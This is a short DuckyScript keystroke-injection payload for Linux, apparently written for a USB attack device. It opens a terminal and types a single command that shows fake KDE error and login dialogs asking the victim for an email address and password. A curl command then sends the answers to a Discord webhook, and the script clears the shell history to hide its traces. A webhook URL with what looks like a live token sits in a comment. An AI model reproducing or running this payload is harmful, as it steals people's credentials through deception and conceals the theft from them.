
REM ###########################################################
REM #                                                         |
REM # Title        : Exfiltrate Email And Password By Phising |
REM # Author       : Aleff                                    |
REM # Version      : 1.0                                      |
REM # Category     : Credentials, Phishing                    |
REM # Target       : Linux                                    |
REM #                                                         |
REM ###########################################################

REM Requirements:
REM     - Internet Connection
REM     - Discord webhook

DELAY 1000
CTRL-ALT t
DELAY 2000


REM #### POPUP SECTION ####


REM REQUIRED - Provide Discord Webhook - https://discord.com/api/webhooks/1292531684213915730/nKbW98mr82RRlPKpf6ach8O_QQ1vKrXbDeP1ubDb6s-1q9J2fr3O28zaqScBJdYnuX8Z
ENTER
DELAY 500

REM All-in-one is important
STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(echo $(kdialog --sorry 'Email incorrect.\n Will not connect to server, please retry.'; kdialog --title 'Email \n Put your email address to connect yout account.' --inputbox 'Email:'; kdialog --title 'Email Login' --password 'Email Password:';))\"}" $WEBHOOK_URL); history -c; exit;
ENTER
